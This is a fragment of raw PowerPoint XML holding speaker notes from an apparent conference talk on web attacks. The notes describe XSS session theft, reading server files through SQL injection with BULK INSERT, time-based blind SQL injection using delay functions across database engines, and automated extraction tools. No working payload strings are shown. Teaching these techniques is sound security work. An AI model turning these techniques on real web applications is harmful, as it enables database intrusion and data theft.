                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2/17/2017 1:37 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRP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latin typeface="Segoe"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© 2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Segoe"/>
                <a:cs typeface="Arial" pitchFamily="34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AB4D5D-1A6D-4D61-8BE8-609AA597F7BC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr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Alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>IE8demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> y IE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853C78C-917B-4EF1-BB96-45C963D4B3EF}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2/17/2017 1:37 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRP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latin typeface="Segoe"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© 2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Segoe"/>
                <a:cs typeface="Arial" pitchFamily="34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BEB0BC-FFA9-4CE4-8861-A0A1D8E46B40}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr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Robo de Sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Página</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> para comprobar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>HTTPOnly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Páginas de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>clickhacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>msdn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In SQL Server 2K </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>First</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>Sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>external</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>repositories</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> drivers. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> are drivers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>plain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> files, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> files, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>excel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t>. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>how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target.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>queried</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>using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Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> Driver. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>By</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>with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Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> Role </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>if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DisallowAdhocAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> cero can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0" err="1"/>
              <a:t>anyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" baseline="0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CD5B0-9781-4608-A250-4DC9ECF41221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other option is to load the file into the database. To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> do this the bulk Insert function can be used. As you can see a temporary table is needed to store the data from the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>To perform all the actions is needed that the user used by the web application to connect against the database engine has the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>bulkadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> server role and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>db_owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>db_ddladmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> database role.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CD5B0-9781-4608-A250-4DC9ECF41221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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Based Behaviors should be use in environments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> where it is to possible to inject code but there is no other difference between true and false response pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>It means, in a true and in a false injection the same page is obtained. So, just to have a different behavior, injections with time delay functions can be used. The functions attackers may use depend on the database engine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In MS SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> function can be used. This function is in the Transact SQL language which MS SQL Server has. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In Oracle the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>dbms_lock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> package has a function called sleep to perform a time delay but this function can only be used within a PL/SQL procedure. So, in no so many environments this trick can be throw against web applications based in Oracle databases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> there are two distinct ways to perform a time delay. First one is sleep function. This is available in version 5 and 6 so in previous versions can´t be used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Second way is based in Benchmark function. This function gives the database engine a lot of stress, so depending on the parameters used a time-delay can be measured. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In this example, you can see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> method used to know if users table exists and if the web application has access privilege to it. If the web application takes 5 seconds to answer then it´s a True and else it´s a False answer. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Let´s see a quick demo of this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Well, last year, people from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Sensepost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> delivered presentation about this topic here in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Defcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> 15.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CD5B0-9781-4608-A250-4DC9ECF41221}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>73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[Parada]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> example of how to automate time-based method to perform blind SQL Injection attacks. In this case, this tool, called SQL Ninja, based in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> method described by Chris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Anley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, is ready to extract all the information in Microsoft SQL Server databases with vulnerable web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline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CD5B0-9781-4608-A250-4DC9ECF41221}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>74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you can see this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is a long process and needs to perform a lot of controls. We made this tool, it´s only a POC tool in alpha version, but it works with several databases. This tool is developed in .NET, and its code is available. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>This tool helps you to automate the data extraction from databases using heavy queries.</a:t>
            </a:r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CD5B0-9781-4608-A250-4DC9ECF41221}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75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A0EEF-F8D3-4766-A94C-FF3B7F6567A1}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="es-E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XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> en campos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="0" dirty="0"/>
              <a:t> (Reto Hacking 3)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Axolote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8E2CC1-1085-4279-87C2-F3B810CDA267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8E2CC1-1085-4279-87C2-F3B810CDA267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8E2CC1-1085-4279-87C2-F3B810CDA267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935B9-12AD-4207-8235-6B11BDE6CAF8}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:pPr/>
              <a:t>104</a:t>
            </a:fld>
            <a:endParaRPr lang="es-E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8E2CC1-1085-4279-87C2-F3B810CDA267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8E2CC1-1085-4279-87C2-F3B810CDA267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8E2CC1-1085-4279-87C2-F3B810CDA267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8E2CC1-1085-4279-87C2-F3B810CDA267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34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9933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E1D099-A79A-4259-B4A4-E4388C21EBD0}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>109</a:t>
            </a:fld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34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003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22538C-01F4-4EA8-A711-95006F146569}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld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935B9-12AD-4207-8235-6B11BDE6CAF8}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:pPr/>
              <a:t>111</a:t>
            </a:fld>
            <a:endParaRPr lang="es-E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935B9-12AD-4207-8235-6B11BDE6CAF8}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:pPr/>
              <a:t>112</a:t>
            </a:fld>
            <a:endParaRPr lang="es-E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34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="983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715AC4-2846-4FB5-AA7C-B28AB5093997}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>113</a:t>
            </a:fld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34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10138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028280-9679-43E1-9E24-3DB512BF982D}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>114</a:t>
            </a:fld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34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10240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9505E-81D3-4BD1-BDC1-1253F5572E01}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>115</a:t>
            </a:fld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34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034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05013-509E-4B8D-8104-764364211986}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>116</a:t>
            </a:fld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34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044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593A5-7632-41A4-9C9C-60F375BDDA8E}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>117</a:t>
            </a:fld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34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054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94315F-D36B-4DDE-ACE2-3C16E2B5AADD}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>118</a:t>
            </a:fld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935B9-12AD-4207-8235-6B11BDE6CAF8}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:pPr/>
              <a:t>119</a:t>
            </a:fld>
            <a:endParaRPr lang="es-E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935B9-12AD-4207-8235-6B11BDE6CAF8}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:pPr/>
              <a:t>120</a:t>
            </a:fld>
            <a:endParaRPr lang="es-E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935B9-12AD-4207-8235-6B11BDE6CAF8}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:pPr/>
              <a:t>121</a:t>
            </a:fld>
            <a:endParaRPr lang="es-E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122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123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124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125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126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127</a:t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128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129</a:t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130</a:t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131</a:t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132</a:t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133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134</a:t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135</a:t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136</a:t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137</a:t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138</a:t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139</a:t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1:37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140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0 Redondear rectángulo de esquina del mismo lado"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
